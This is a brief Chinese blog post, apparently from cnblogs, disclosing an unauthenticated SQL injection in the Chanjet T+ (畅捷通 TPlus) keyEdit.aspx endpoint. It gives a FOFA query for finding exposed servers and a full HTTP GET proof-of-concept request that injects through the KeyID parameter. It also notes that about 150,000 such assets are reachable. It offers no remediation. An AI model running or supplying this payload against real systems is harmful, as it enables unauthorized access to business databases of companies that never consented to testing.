漏洞描述:
该漏洞是由于畅捷通T的/tplus/UFAQD/keyEdit.asp接口处未对用户的输入进行过滤和校验,未经身份验证的攻击者可以利用SQL注入漏洞获取数据库中的信息
fofa: app="畅捷通-TPlus"
POC:
GET /tplus/UFAQD/keyEdit.aspx?KeyID=1%27%20and%201=(select%20@@version)%20--&preload=1 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Host: xx.xxx.xxx.xxx
Accept-Charset: utf-8
漏洞复现:
在fofa中搜索资产,有15万条资产
对目标资产构建语句
标签:漏洞,Accept,TPlus,keyEdit,SQL,aspx,捷通 From: https://www.cnblogs.com/LeouMaster/p/18190505